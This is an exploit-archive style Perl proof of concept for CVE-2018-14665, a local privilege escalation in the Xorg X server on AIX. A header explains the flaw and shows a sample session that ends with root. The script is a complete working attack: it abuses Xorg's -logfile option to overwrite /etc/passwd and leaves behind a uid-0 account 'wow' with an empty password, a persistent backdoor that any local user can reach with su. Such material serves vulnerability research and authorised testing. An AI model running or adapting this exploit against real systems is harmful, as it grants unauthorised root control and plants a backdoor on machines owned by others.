# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary file overwrite when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
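# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root
#!/usr/bin/perl
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);

# NOTE(review): this PoC temporarily replaces /etc/passwd and, on success,
# leaves behind a uid-0 account ('wow') with an EMPTY password field.  Until
# that entry is removed, every local user can 'su wow' to root.  Run it only
# on systems you are authorised to test, and delete the account afterwards.

my $passwd_path = '/etc/passwd';
my $script_path = '/tmp/wow.ksh';        # payload script interpreted by ksh93
my $backup_path = '/tmp/passwd.backup';  # copy of the original passwd file
my $new_user    = 'wow';
my $new_entry   = 'wow::0:0::/:/usr/bin/ksh';

print "[+] AIX X11 server local root exploit\n";

# Locate Xorg (the privileged server whose -logfile handling is abused) and
# ksh93 (needed for the $'...' ANSI-C quoting the payload relies on).
print "[-] Checking for Xorg and ksh93 \n";
my $xorg = locate_binary('Xorg');
if ($xorg eq '') {
    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
    exit 1;
}
my $ksh = locate_binary('ksh93');
if ($ksh eq '') {
    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
    exit 1;
}
# The overwrite only works when the server runs with elevated privileges
# (see header).  Warn rather than abort so this check cannot block a run
# where privileges are gained some other way.
print "[!] $xorg is not setuid; the overwrite will probably fail\n" unless -u $xorg;

# Read the current passwd file; its lines are reused for the overwrite and
# for the backup written below.
print "[-] Opening /etc/passwd \n";
open(my $passwd_fh, '<', $passwd_path)
    or die "[X] Cannot read $passwd_path: $!\n";
chomp(my @passwd_lines = <$passwd_fh>);
close($passwd_fh);

# Every logged-in user must keep a passwd entry while the file is replaced,
# otherwise AIX fails with 'Cannot get "LOGNAME" variable' on su (see header).
print "[-] Retrieving currently logged in users \n";
my %logged_in = map { my ($n) = split ' ', $_; ($n => 1) } grep { /\S/ } `who`;
# The invoking user is needed in any case, even if 'who' does not list the
# current session (e.g. no controlling tty).
my $me = getpwuid($<);
$logged_in{$me} = 1 if defined $me;

# Keep only the passwd lines whose first field (login name) is logged in.
my @kept_entries = grep {
    my ($name) = /\A([^:]*):/;
    defined $name && $logged_in{$name};
} @passwd_lines;
print "[!] No passwd entry found for any logged-in user; su may fail afterwards\n"
    unless @kept_entries;

# Build the Xorg command line.  The argument to '-config' is echoed into the
# log file that Xorg creates at the -logfile path; '-fp' is not (original
# author's note).  It is written as a ksh93 ANSI-C string: each '\n' below is
# the two characters backslash and n, which ksh93 turns into a newline, so the
# log (i.e. the new /etc/passwd) ends up with one passwd entry per line.  The
# trailing '#' comments out whatever Xorg appends after the argument.
print "[-] Generating Xorg command \n";
my $entries = join '', map { '\n' . $_ } @kept_entries;
my $blob = q{-config $'} . $entries . '\n' . $new_entry . '\n#' . q{'};

# Create the payload script exclusively (O_EXCL): never write through a file
# or symlink another local user may have planted in /tmp under this fixed
# name, since we are about to execute it.
print "[-] Opening /tmp/wow.ksh \n";
sysopen(my $script_fh, $script_path, O_WRONLY | O_CREAT | O_EXCL, 0700)
    or die "[X] Cannot create $script_path: $! (stale file from a previous run?)\n";
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print {$script_fh} "#!$ksh\n";
# NOTE(review): the relative -logfile path is taken verbatim from the
# original PoC; which directory Xorg resolves it against is not visible here.
print {$script_fh} "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close($script_fh) or die "[X] Cannot write $script_path: $!\n";

# Back up passwd from the lines already read, again exclusively and 0600,
# instead of 'cp' into a name anyone may have pre-created: root later copies
# this file back over /etc/passwd, so its contents must not be tamperable.
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
sysopen(my $backup_fh, $backup_path, O_WRONLY | O_CREAT | O_EXCL, 0600)
    or do { unlink $script_path; die "[X] Cannot create $backup_path: $!\n"; };
print {$backup_fh} map { "$_\n" } @passwd_lines;
close($backup_fh)
    or do { unlink $script_path; die "[X] Cannot write $backup_path: $!\n"; };

# sysopen already asked for 0700, but the umask may have masked bits.
print "[-] Making /tmp/wow.ksh executable \n";
chmod 0700, $script_path
    or do { unlink $script_path; die "[X] Cannot chmod $script_path: $!\n"; };

# Run the payload.  Its exit status is deliberately ignored (output is
# discarded); success is judged by re-reading /etc/passwd below.
print "[-] Executing /tmp/wow.ksh \n";
system($script_path);

# Do not call 'su' blindly: confirm the new uid-0 entry actually landed.
my $overwritten = 0;
if (open(my $check_fh, '<', $passwd_path)) {
    $overwritten = grep { /\A\Q$new_user\E::0:0:/ } <$check_fh>;
    close($check_fh);
}
unless ($overwritten) {
    unlink $script_path;
    print "[X] $passwd_path does not contain the '$new_user' entry; the overwrite failed.\n";
    print "    Check $passwd_path by hand; a copy of the original is at $backup_path.\n";
    exit 1;
}

# Same argv the original 'su wow "-c ..."' invocation produced, minus the
# intermediate /bin/sh: the new uid-0 account restores the saved passwd and
# appends itself, leaving the host with its original accounts plus 'wow'.
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
my $restore_cmd = "-c cp $backup_path $passwd_path && echo '$new_entry' >> $passwd_path";
my $status = system('su', $new_user, $restore_cmd);
unlink $script_path or warn "[!] Could not remove $script_path: $!\n";
if ($status != 0) {
    my $code = $? >> 8;
    print "[X] Restoring $passwd_path via 'su $new_user' failed (exit $code).\n";
    print "    $passwd_path currently holds only the logged-in users plus '$new_user';\n";
    print "    restore it from $backup_path as root before logging out.\n";
    exit 1;
}
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";

# Resolve a command name via the shell's 'command -v'; returns '' when not
# found.  Only ever called with the fixed literals above.
sub locate_binary {
    my ($name) = @_;
    chomp(my $path = `command -v $name`);
    return $path;
}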